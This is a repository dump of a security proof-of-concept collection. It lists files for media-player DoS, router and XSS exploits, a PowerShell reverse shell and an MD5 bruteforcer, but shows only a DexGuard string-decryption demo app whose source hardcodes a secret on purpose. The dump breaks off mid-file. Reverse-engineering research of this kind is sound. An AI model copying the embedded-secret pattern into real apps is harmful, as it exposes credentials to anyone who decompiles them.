├── .gitignore
├── DexGuard_String_Decryption
    ├── .DS_Store
    ├── DexGuard_Protected_APK.apk
    └── SRC
    │   ├── .DS_Store
    │   ├── DexReverseDemo.iml
    │   ├── app
    │       ├── .DS_Store
    │       ├── .gitignore
    │       ├── app-release.apk
    │       ├── app.iml
    │       ├── build.gradle
    │       ├── dexguard-project.txt
    │       ├── manifest-merger-release-report.txt
    │       ├── proguard-android.txt
    │       ├── proguard-project.txt
    │       ├── proguard-rules.pro
    │       └── src
    │       │   ├── .DS_Store
    │       │   ├── androidTest
    │       │       ├── .DS_Store
    │       │       └── java
    │       │       │   ├── .DS_Store
    │       │       │   └── opensecurity
    │       │       │       ├── .DS_Store
    │       │       │       └── dexreversedemo
    │       │       │           └── ApplicationTest.java
    │       │   └── main
    │       │       ├── .DS_Store
    │       │       ├── AndroidManifest.xml
    │       │       ├── java
    │       │           ├── .DS_Store
    │       │           └── opensecurity
    │       │           │   ├── .DS_Store
    │       │           │   └── dexreversedemo
    │       │           │       ├── .DS_Store
    │       │           │       ├── MainActivity.java
    │       │           │       └── Secret.java
    │       │       └── res
    │       │           ├── .DS_Store
    │       │           ├── drawable-hdpi
    │       │               └── ic_launcher.png
    │       │           ├── drawable-mdpi
    │       │               └── ic_launcher.png
    │       │           ├── drawable-xhdpi
    │       │               └── ic_launcher.png
    │       │           ├── drawable-xxhdpi
    │       │               └── ic_launcher.png
    │       │           ├── layout
    │       │               ├── activity_main.xml
    │       │               └── activity_secret.xml
    │       │           ├── menu
    │       │               ├── menu_main.xml
    │       │               └── menu_secret.xml
    │       │           ├── values-w820dp
    │       │               └── dimens.xml
    │       │           └── values
    │       │               ├── dimens.xml
    │       │               ├── strings.xml
    │       │               └── styles.xml
    │   ├── build.gradle
    │   ├── gradle.properties
    │   ├── gradle
    │       ├── .DS_Store
    │       └── wrapper
    │       │   ├── .DS_Store
    │       │   ├── gradle-wrapper.jar
    │       │   └── gradle-wrapper.properties
    │   ├── gradlew
    │   ├── gradlew.bat
    │   ├── local.properties
    │   └── settings.gradle
├── KMPlayer 3.7.0.109 Integer division by zero DoS.py
├── KMPlayer 3.9.1.130 Integer division by zero DoS.py
├── MTS MBlaze Ultra Wi-Fi_ZTE AC3633 Exploit.py
├── README.md
├── WordPress Clean And Simple Contact Form 4.4.0 XSS
├── applock md5 bruteforce.go
├── csp.gif
├── github_revoke_this_please.env
├── polyglot.html
├── reverse_shell.ps1
├── script.js
└── terminal-poc


/.gitignore:
--------------------------------------------------------------------------------
 1 | # Byte-compiled / optimized / DLL files
 2 | __pycache__/
 3 | *.py[cod]
 4 | 
 5 | # C extensions
 6 | *.so
 7 | 
 8 | # Distribution / packaging
 9 | .Python
10 | env/
11 | bin/
12 | build/
13 | develop-eggs/
14 | dist/
15 | eggs/
16 | lib/
17 | lib64/
18 | parts/
19 | sdist/
20 | var/
21 | *.egg-info/
22 | .installed.cfg
23 | *.egg
24 | 
25 | # Installer logs
26 | pip-log.txt
27 | pip-delete-this-directory.txt
28 | 
29 | # Unit test / coverage reports
30 | htmlcov/
31 | .tox/
32 | .coverage
33 | .cache
34 | nosetests.xml
35 | coverage.xml
36 | 
37 | # Translations
38 | *.mo
39 | 
40 | # Mr Developer
41 | .mr.developer.cfg
42 | .project
43 | .pydevproject
44 | 
45 | # Rope
46 | .ropeproject
47 | 
48 | # Django stuff:
49 | *.log
50 | *.pot
51 | 
52 | # Sphinx documentation
53 | docs/_build/
54 | 
55 | 


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/DexGuard_String_Decryption/.DS_Store


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/DexGuard_Protected_APK.apk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/DexGuard_String_Decryption/DexGuard_Protected_APK.apk


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/DexGuard_String_Decryption/SRC/.DS_Store


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/DexReverseDemo.iml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <module external.linked.project.path="$MODULE_DIR$" external.root.project.path="$MODULE_DIR$" external.system.id="GRADLE" type="JAVA_MODULE" version="4">
 3 |   <component name="FacetManager">
 4 |     <facet type="java-gradle" name="Java-Gradle">
 5 |       <configuration>
 6 |         <option name="BUILD_FOLDER_PATH" value="$MODULE_DIR$/build" />
 7 |       </configuration>
 8 |     </facet>
 9 |   </component>
10 |   <component name="NewModuleRootManager" inherit-compiler-output="false">
11 |     <output url="file://$MODULE_DIR$/build/classes/main" />
12 |     <output-test url="file://$MODULE_DIR$/build/classes/test" />
13 |     <exclude-output />
14 |     <content url="file://$MODULE_DIR$">
15 |       <excludeFolder url="file://$MODULE_DIR$/.gradle" />
16 |     </content>
17 |     <orderEntry type="inheritedJdk" />
18 |     <orderEntry type="sourceFolder" forTests="false" />
19 |   </component>
20 | </module>
21 | 
22 | 


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/DexGuard_String_Decryption/SRC/app/.DS_Store


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/.gitignore:
--------------------------------------------------------------------------------
1 | /build
2 | 


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/app-release.apk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/DexGuard_String_Decryption/SRC/app/app-release.apk


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/app.iml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <module external.linked.project.path="$MODULE_DIR$" external.root.project.path="$MODULE_DIR$/.." external.system.id="GRADLE" type="JAVA_MODULE" version="4">
 3 |   <component name="FacetManager">
 4 |     <facet type="android-gradle" name="Android-Gradle">
 5 |       <configuration>
 6 |         <option name="GRADLE_PROJECT_PATH" value=":app" />
 7 |       </configuration>
 8 |     </facet>
 9 |     <facet type="android" name="Android">
10 |       <configuration>
11 |         <option name="SELECTED_BUILD_VARIANT" value="debug" />
12 |         <option name="ASSEMBLE_TASK_NAME" value="assembleDebug" />
13 |         <option name="COMPILE_JAVA_TASK_NAME" value="compileDebugSources" />
14 |         <option name="ASSEMBLE_TEST_TASK_NAME" value="assembleDebugTest" />
15 |         <option name="SOURCE_GEN_TASK_NAME" value="generateDebugSources" />
16 |         <option name="TEST_SOURCE_GEN_TASK_NAME" value="generateDebugTestSources" />
17 |         <option name="ALLOW_USER_CONFIGURATION" value="false" />
18 |         <option name="MANIFEST_FILE_RELATIVE_PATH" value="/src/main/AndroidManifest.xml" />
19 |         <option name="RES_FOLDER_RELATIVE_PATH" value="/src/main/res" />
20 |         <option name="RES_FOLDERS_RELATIVE_PATH" value="file://$MODULE_DIR$/src/main/res" />
21 |         <option name="ASSETS_FOLDER_RELATIVE_PATH" value="/src/main/assets" />
22 |       </configuration>
23 |     </facet>
24 |   </component>
25 |   <component name="NewModuleRootManager" inherit-compiler-output="false">
26 |     <output url="file://$MODULE_DIR$/build/intermediates/classes/debug" />
27 |     <exclude-output />
28 |     <content url="file://$MODULE_DIR$">
29 |       <sourceFolder url="file://$MODULE_DIR$/build/generated/source/r/debug" isTestSource="false" generated="true" />
30 |       <sourceFolder url="file://$MODULE_DIR$/build/generated/source/aidl/debug" isTestSource="false" generated="true" />
31 |       <sourceFolder url="file://$MODULE_DIR$/build/generated/source/buildConfig/debug" isTestSource="false" generated="true" />
32 |       <sourceFolder url="file://$MODULE_DIR$/build/generated/source/rs/debug" isTestSource="false" generated="true" />
33 |       <sourceFolder url="file://$MODULE_DIR$/build/generated/res/rs/debug" type="java-resource" />
34 |       <sourceFolder url="file://$MODULE_DIR$/build/generated/res/generated/debug" type="java-resource" />
35 |       <sourceFolder url="file://$MODULE_DIR$/build/generated/source/r/test/debug" isTestSource="true" generated="true" />
36 |       <sourceFolder url="file://$MODULE_DIR$/build/generated/source/aidl/test/debug" isTestSource="true" generated="true" />
37 |       <sourceFolder url="file://$MODULE_DIR$/build/generated/source/buildConfig/test/debug" isTestSource="true" generated="true" />
38 |       <sourceFolder url="file://$MODULE_DIR$/build/generated/source/rs/test/debug" isTestSource="true" generated="true" />
39 |       <sourceFolder url="file://$MODULE_DIR$/build/generated/res/rs/test/debug" type="java-test-resource" />
40 |       <sourceFolder url="file://$MODULE_DIR$/build/generated/res/generated/test/debug" type="java-test-resource" />
41 |       <sourceFolder url="file://$MODULE_DIR$/src/debug/res" type="java-resource" />
42 |       <sourceFolder url="file://$MODULE_DIR$/src/debug/resources" type="java-resource" />
43 |       <sourceFolder url="file://$MODULE_DIR$/src/debug/assets" type="java-resource" />
44 |       <sourceFolder url="file://$MODULE_DIR$/src/debug/aidl" isTestSource="false" />
45 |       <sourceFolder url="file://$MODULE_DIR$/src/debug/java" isTestSource="false" />
46 |       <sourceFolder url="file://$MODULE_DIR$/src/debug/jni" isTestSource="false" />
47 |       <sourceFolder url="file://$MODULE_DIR$/src/debug/rs" isTestSource="false" />
48 |       <sourceFolder url="file://$MODULE_DIR$/src/main/res" type="java-resource" />
49 |       <sourceFolder url="file://$MODULE_DIR$/src/main/resources" type="java-resource" />
50 |       <sourceFolder url="file://$MODULE_DIR$/src/main/assets" type="java-resource" />
51 |       <sourceFolder url="file://$MODULE_DIR$/src/main/aidl" isTestSource="false" />
52 |       <sourceFolder url="file://$MODULE_DIR$/src/main/java" isTestSource="false" />
53 |       <sourceFolder url="file://$MODULE_DIR$/src/main/jni" isTestSource="false" />
54 |       <sourceFolder url="file://$MODULE_DIR$/src/main/rs" isTestSource="false" />
55 |       <sourceFolder url="file://$MODULE_DIR$/src/androidTest/res" type="java-test-resource" />
56 |       <sourceFolder url="file://$MODULE_DIR$/src/androidTest/resources" type="java-test-resource" />
57 |       <sourceFolder url="file://$MODULE_DIR$/src/androidTest/assets" type="java-test-resource" />
58 |       <sourceFolder url="file://$MODULE_DIR$/src/androidTest/aidl" isTestSource="true" />
59 |       <sourceFolder url="file://$MODULE_DIR$/src/androidTest/java" isTestSource="true" />
60 |       <sourceFolder url="file://$MODULE_DIR$/src/androidTest/jni" isTestSource="true" />
61 |       <sourceFolder url="file://$MODULE_DIR$/src/androidTest/rs" isTestSource="true" />
62 |       <excludeFolder url="file://$MODULE_DIR$/build/intermediates/assets" />
63 |       <excludeFolder url="file://$MODULE_DIR$/build/intermediates/bundles" />
64 |       <excludeFolder url="file://$MODULE_DIR$/build/intermediates/classes" />
65 |       <excludeFolder url="file://$MODULE_DIR$/build/intermediates/coverage-instrumented-classes" />
66 |       <excludeFolder url="file://$MODULE_DIR$/build/intermediates/dependency-cache" />
67 |       <excludeFolder url="file://$MODULE_DIR$/build/intermediates/dex" />
68 |       <excludeFolder url="file://$MODULE_DIR$/build/intermediates/dex-cache" />
69 |       <excludeFolder url="file://$MODULE_DIR$/build/intermediates/incremental" />
70 |       <excludeFolder url="file://$MODULE_DIR$/build/intermediates/jacoco" />
71 |       <excludeFolder url="file://$MODULE_DIR$/build/intermediates/javaResources" />
72 |       <excludeFolder url="file://$MODULE_DIR$/build/intermediates/libs" />
73 |       <excludeFolder url="file://$MODULE_DIR$/build/intermediates/lint" />
74 |       <excludeFolder url="file://$MODULE_DIR$/build/intermediates/manifests" />
75 |       <excludeFolder url="file://$MODULE_DIR$/build/intermediates/ndk" />
76 |       <excludeFolder url="file://$MODULE_DIR$/build/intermediates/pre-dexed" />
77 |       <excludeFolder url="file://$MODULE_DIR$/build/intermediates/proguard" />
78 |       <excludeFolder url="file://$MODULE_DIR$/build/intermediates/res" />
79 |       <excludeFolder url="file://$MODULE_DIR$/build/intermediates/rs" />
80 |       <excludeFolder url="file://$MODULE_DIR$/build/intermediates/symbols" />
81 |       <excludeFolder url="file://$MODULE_DIR$/build/outputs" />
82 |       <excludeFolder url="file://$MODULE_DIR$/build/tmp" />
83 |     </content>
84 |     <orderEntry type="jdk" jdkName="Android API 21 Platform" jdkType="Android SDK" />
85 |     <orderEntry type="sourceFolder" forTests="false" />
86 |     <orderEntry type="library" exported="" name="appcompat-v7-21.0.3" level="project" />
87 |     <orderEntry type="library" exported="" name="support-annotations-21.0.3" level="project" />
88 |     <orderEntry type="library" exported="" name="support-v4-21.0.3" level="project" />
89 |     <orderEntry type="library" exported="" name="dexguard_util" level="project" />
90 |   </component>
91 | </module>
92 | 
93 | 


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/build.gradle:
--------------------------------------------------------------------------------
 1 | buildscript {
 2 |     repositories {
 3 |         mavenCentral()
 4 |         flatDir { dirs '/Users/aabraham/DexGuard6.1.07/lib' }
 5 |     }
 6 |     dependencies {
 7 |         classpath 'com.android.tools.build:gradle:1.0.0'
 8 |         classpath ':dexguard:'
 9 |     }
10 | }
11 | 
12 | apply plugin: 'com.android.application'
13 | apply plugin: 'dexguard'
14 | android {
15 |     compileSdkVersion 21
16 |     buildToolsVersion "21.1.2"
17 | 
18 |     defaultConfig {
19 |         applicationId "opensecurity.sendsecret"
20 |         minSdkVersion 17
21 |         targetSdkVersion 21
22 |         versionCode 1
23 |         versionName "1.0"
24 |     }
25 |     buildTypes {
26 |         debug {
27 |             proguardFile getDefaultDexGuardFile('dexguard-debug.pro')
28 |             proguardFile 'dexguard-project.txt'
29 |             proguardFile 'proguard-project.txt'
30 |         }
31 |         release {
32 |             minifyEnabled true
33 |             proguardFiles getDefaultProguardFile('proguard-android.txt'), 'proguard-rules.pro'
34 |             proguardFile getDefaultDexGuardFile('dexguard-release.pro')
35 |             proguardFile 'dexguard-project.txt'
36 |             proguardFile 'proguard-project.txt'
37 |         }
38 |     }
39 | }
40 | 
41 | dependencies {
42 |     compile fileTree(dir: 'libs', include: ['*.jar'])
43 |     compile 'com.android.support:appcompat-v7:21.0.3'
44 |     compile files('libs/dexguard_util.jar')
45 | }
46 | 


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/dexguard-project.txt:
--------------------------------------------------------------------------------
1 | -encryptstrings "SuperZS3cur!ty0R0CK3S"
2 | -encryptclasses opensecurity.dexreversedemo.MainActivity,opensecurity.dexreversedemo.Secret
3 | 


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/manifest-merger-release-report.txt:
--------------------------------------------------------------------------------
 1 | -- Merging decision tree log ---
 2 | manifest
 3 | ADDED from AndroidManifest.xml:2:1
 4 | 	xmlns:android
 5 | 		ADDED from AndroidManifest.xml:2:11
 6 | 	package
 7 | 		ADDED from AndroidManifest.xml:3:5
 8 | 		INJECTED from AndroidManifest.xml:0:0
 9 | 		INJECTED from AndroidManifest.xml:0:0
10 | 	android:versionName
11 | 		INJECTED from AndroidManifest.xml:0:0
12 | 		INJECTED from AndroidManifest.xml:0:0
13 | 	android:versionCode
14 | 		INJECTED from AndroidManifest.xml:0:0
15 | 		INJECTED from AndroidManifest.xml:0:0
16 | application
17 | ADDED from AndroidManifest.xml:5:5
18 | MERGED from com.android.support:appcompat-v7:21.0.3:16:5
19 | MERGED from com.android.support:support-v4:21.0.3:16:5
20 | 	android:label
21 | 		ADDED from AndroidManifest.xml:8:9
22 | 	android:allowBackup
23 | 		ADDED from AndroidManifest.xml:6:9
24 | 	android:icon
25 | 		ADDED from AndroidManifest.xml:7:9
26 | 	android:theme
27 | 		ADDED from AndroidManifest.xml:9:9
28 | activity#opensecurity.dexreversedemo.MainActivity
29 | ADDED from AndroidManifest.xml:10:9
30 | 	android:label
31 | 		ADDED from AndroidManifest.xml:12:13
32 | 	android:name
33 | 		ADDED from AndroidManifest.xml:11:13
34 | intent-filter#android.intent.action.MAIN+android.intent.category.LAUNCHER
35 | ADDED from AndroidManifest.xml:13:13
36 | action#android.intent.action.MAIN
37 | ADDED from AndroidManifest.xml:14:17
38 | 	android:name
39 | 		ADDED from AndroidManifest.xml:14:25
40 | category#android.intent.category.LAUNCHER
41 | ADDED from AndroidManifest.xml:16:17
42 | 	android:name
43 | 		ADDED from AndroidManifest.xml:16:27
44 | activity#opensecurity.dexreversedemo.Secret
45 | ADDED from AndroidManifest.xml:19:9
46 | 	android:label
47 | 		ADDED from AndroidManifest.xml:21:13
48 | 	android:name
49 | 		ADDED from AndroidManifest.xml:20:13
50 | uses-sdk
51 | INJECTED from AndroidManifest.xml:0:0 reason: use-sdk injection requested
52 | MERGED from com.android.support:appcompat-v7:21.0.3:15:5
53 | MERGED from com.android.support:support-v4:21.0.3:15:5
54 | 	android:targetSdkVersion
55 | 		INJECTED from AndroidManifest.xml:0:0
56 | 		INJECTED from AndroidManifest.xml:0:0
57 | 	android:minSdkVersion
58 | 		INJECTED from AndroidManifest.xml:0:0
59 | 		INJECTED from AndroidManifest.xml:0:0
60 | 


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/proguard-android.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/DexGuard_String_Decryption/SRC/app/proguard-android.txt


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/proguard-project.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/DexGuard_String_Decryption/SRC/app/proguard-project.txt


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/proguard-rules.pro:
--------------------------------------------------------------------------------
 1 | # Add project specific ProGuard rules here.
 2 | # By default, the flags in this file are appended to flags specified
 3 | # in /Users/aabraham/Library/Android/sdk/tools/proguard/proguard-android.txt
 4 | # You can edit the include path and order by changing the proguardFiles
 5 | # directive in build.gradle.
 6 | #
 7 | # For more details, see
 8 | #   http://developer.android.com/guide/developing/tools/proguard.html
 9 | 
10 | # Add any project specific keep options here:
11 | 
12 | # If your project uses WebView with JS, uncomment the following
13 | # and specify the fully qualified class name to the JavaScript interface
14 | # class:
15 | #-keepclassmembers class fqcn.of.javascript.interface.for.webview {
16 | #   public *;
17 | #}
18 | 


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/DexGuard_String_Decryption/SRC/app/src/.DS_Store


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/androidTest/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/DexGuard_String_Decryption/SRC/app/src/androidTest/.DS_Store


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/androidTest/java/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/DexGuard_String_Decryption/SRC/app/src/androidTest/java/.DS_Store


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/androidTest/java/opensecurity/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/DexGuard_String_Decryption/SRC/app/src/androidTest/java/opensecurity/.DS_Store


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/androidTest/java/opensecurity/dexreversedemo/ApplicationTest.java:
--------------------------------------------------------------------------------
 1 | package opensecurity.dexreversedemo;
 2 | 
 3 | import android.app.Application;
 4 | import android.test.ApplicationTestCase;
 5 | 
 6 | /**
 7 |  * <a href="http://d.android.com/tools/testing/testing_android.html">Testing Fundamentals</a>
 8 |  */
 9 | public class ApplicationTest extends ApplicationTestCase<Application> {
10 |     public ApplicationTest() {
11 |         super(Application.class);
12 |     }
13 | }


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/main/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/DexGuard_String_Decryption/SRC/app/src/main/.DS_Store


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/main/AndroidManifest.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <manifest xmlns:android="http://schemas.android.com/apk/res/android"
 3 |     package="opensecurity.dexreversedemo" >
 4 | 
 5 |     <application
 6 |         android:allowBackup="true"
 7 |         android:icon="@drawable/ic_launcher"
 8 |         android:label="@string/app_name"
 9 |         android:theme="@style/AppTheme" >
10 |         <activity
11 |             android:name=".MainActivity"
12 |             android:label="@string/app_name" >
13 |             <intent-filter>
14 |                 <action android:name="android.intent.action.MAIN" />
15 | 
16 |                 <category android:name="android.intent.category.LAUNCHER" />
17 |             </intent-filter>
18 |         </activity>
19 |         <activity
20 |             android:name=".Secret"
21 |             android:label="@string/title_activity_secret" >
22 |         </activity>
23 |     </application>
24 | 
25 | </manifest>
26 | 


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/main/java/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/DexGuard_String_Decryption/SRC/app/src/main/java/.DS_Store


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/main/java/opensecurity/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/DexGuard_String_Decryption/SRC/app/src/main/java/opensecurity/.DS_Store


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/main/java/opensecurity/dexreversedemo/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/DexGuard_String_Decryption/SRC/app/src/main/java/opensecurity/dexreversedemo/.DS_Store


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/main/java/opensecurity/dexreversedemo/MainActivity.java:
--------------------------------------------------------------------------------
 1 | package opensecurity.dexreversedemo;
 2 | 
 3 | import android.content.Intent;
 4 | import android.os.Bundle;
 5 | import android.support.v7.app.ActionBarActivity;
 6 | import android.view.Menu;
 7 | import android.view.MenuItem;
 8 | import android.view.View;
 9 | import android.widget.Button;
10 | 
11 | 
12 | public class MainActivity extends ActionBarActivity {
13 | public Button bt;
14 |     private final static String secret="SuperZS3cur!ty0R0CK3S";
15 |     @Override
16 |     protected void onCreate(Bundle savedInstanceState) {
17 |         super.onCreate(savedInstanceState);
18 |         setContentView(R.layout.activity_main);
19 |         bt=(Button)findViewById(R.id.button);
20 |         bt.setOnClickListener(new View.OnClickListener() {
21 |             @Override
22 |             public void onClick(View v) {
23 |                 Intent ask = new Intent(MainActivity.this, Secret.class);
24 |                 ask.putExtra("SECURE",secret);
25 |                 startActivity(ask);
26 |             }
27 |         });
28 |     }
29 | 
30 | 
31 |     @Override
32 |     public boolean onCreateOptionsMenu(Menu menu) {
33 |         // Inflate the menu; this adds items to the action bar if it is present.
34 |         getMenuInflater().inflate(R.menu.menu_main, menu);
35 |         return true;
36 |     }
37 | 
38 |     @Override
39 |     public boolean onOptionsItemSelected(MenuItem item) {
40 |         // Handle action bar item clicks here. The action bar will
41 |         // automatically handle clicks on the Home/Up button, so long
42 |         // as you specify a parent activity in AndroidManifest.xml.
43 |         int id = item.getItemId();
44 | 
45 |         //noinspection SimplifiableIfStatement
46 |         if (id == R.id.action_settings) {
47 |             return true;
48 |         }
49 | 
50 |         return super.onOptionsItemSelected(item);
51 |     }
52 | }
53 | 


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/main/java/opensecurity/dexreversedemo/Secret.java:
--------------------------------------------------------------------------------
 1 | package opensecurity.dexreversedemo;
 2 | 
 3 | import android.os.Bundle;
 4 | import android.support.v7.app.ActionBarActivity;
 5 | import android.view.Menu;
 6 | import android.view.MenuItem;
 7 | import android.widget.TextView;
 8 | 
 9 | 
10 | public class Secret extends ActionBarActivity {
11 | public TextView t;
12 | 
13 |     @Override
14 |     protected void onCreate(Bundle savedInstanceState) {
15 |         super.onCreate(savedInstanceState);
16 |         setContentView(R.layout.activity_secret);
17 | 
18 |     }
19 | 
20 | 
21 |     @Override
22 |     public boolean onCreateOptionsMenu(Menu menu) {
23 |         // Inflate the menu; this adds items to the action bar if it is present.
24 |         getMenuInflater().inflate(R.menu.menu_secret, menu);
25 |         return true;
26 |     }
27 | 
28 |     @Override
29 |     public boolean onOptionsItemSelected(MenuItem item) {
30 |         // Handle action bar item clicks here. The action bar will
31 |         // automatically handle clicks on the Home/Up button, so long
32 |         // as you specify a parent activity in AndroidManifest.xml.
33 |         int id = item.getItemId();
34 | 
35 |         //noinspection SimplifiableIfStatement
36 |         if (id == R.id.action_settings) {
37 |             return true;
38 |         }
39 | 
40 |         return super.onOptionsItemSelected(item);
41 |     }
42 | }
43 | 


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/main/res/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/DexGuard_String_Decryption/SRC/app/src/main/res/.DS_Store


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/main/res/drawable-hdpi/ic_launcher.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/DexGuard_String_Decryption/SRC/app/src/main/res/drawable-hdpi/ic_launcher.png


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/main/res/drawable-mdpi/ic_launcher.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/DexGuard_String_Decryption/SRC/app/src/main/res/drawable-mdpi/ic_launcher.png


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/main/res/drawable-xhdpi/ic_launcher.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/DexGuard_String_Decryption/SRC/app/src/main/res/drawable-xhdpi/ic_launcher.png


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/main/res/drawable-xxhdpi/ic_launcher.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/DexGuard_String_Decryption/SRC/app/src/main/res/drawable-xxhdpi/ic_launcher.png


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/main/res/layout/activity_main.xml:
--------------------------------------------------------------------------------
 1 | <RelativeLayout xmlns:android="http://schemas.android.com/apk/res/android"
 2 |     xmlns:tools="http://schemas.android.com/tools" android:layout_width="match_parent"
 3 |     android:layout_height="match_parent" android:paddingLeft="@dimen/activity_horizontal_margin"
 4 |     android:paddingRight="@dimen/activity_horizontal_margin"
 5 |     android:paddingTop="@dimen/activity_vertical_margin"
 6 |     android:paddingBottom="@dimen/activity_vertical_margin" tools:context=".MainActivity">
 7 | 
 8 |     <Button
 9 |         android:layout_width="wrap_content"
10 |         android:layout_height="wrap_content"
11 |         android:text="Go"
12 |         android:id="@+id/button"
13 |         android:layout_centerVertical="true"
14 |         android:layout_centerHorizontal="true" />
15 | </RelativeLayout>
16 | 


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/main/res/layout/activity_secret.xml:
--------------------------------------------------------------------------------
 1 | <RelativeLayout xmlns:android="http://schemas.android.com/apk/res/android"
 2 |     xmlns:tools="http://schemas.android.com/tools" android:layout_width="match_parent"
 3 |     android:layout_height="match_parent" android:paddingLeft="@dimen/activity_horizontal_margin"
 4 |     android:paddingRight="@dimen/activity_horizontal_margin"
 5 |     android:paddingTop="@dimen/activity_vertical_margin"
 6 |     android:paddingBottom="@dimen/activity_vertical_margin"
 7 |     tools:context="opensecurity.dexreversedemo.Secret">
 8 | 
 9 | </RelativeLayout>
10 | 


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/main/res/menu/menu_main.xml:
--------------------------------------------------------------------------------
1 | <menu xmlns:android="http://schemas.android.com/apk/res/android"
2 |     xmlns:app="http://schemas.android.com/apk/res-auto"
3 |     xmlns:tools="http://schemas.android.com/tools" tools:context=".MainActivity">
4 |     <item android:id="@+id/action_settings" android:title="@string/action_settings"
5 |         android:orderInCategory="100" app:showAsAction="never" />
6 | </menu>
7 | 


--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/main/res/menu/menu_secret.xml:
--------------------------------------------------------------------------------
1 | <menu xmlns:android="http://schemas.android.com/apk/res/android"
2 |     xmlns:app="http://schemas.android.com/apk/res-auto"
3 |     xmlns:tools="http://schemas.android.com/tools"
4 |     tools:context="opensecurity.dexreversedemo.Secret">
5 |     <item android:id="@+id/action_settings" android:title="@string/action_settings"
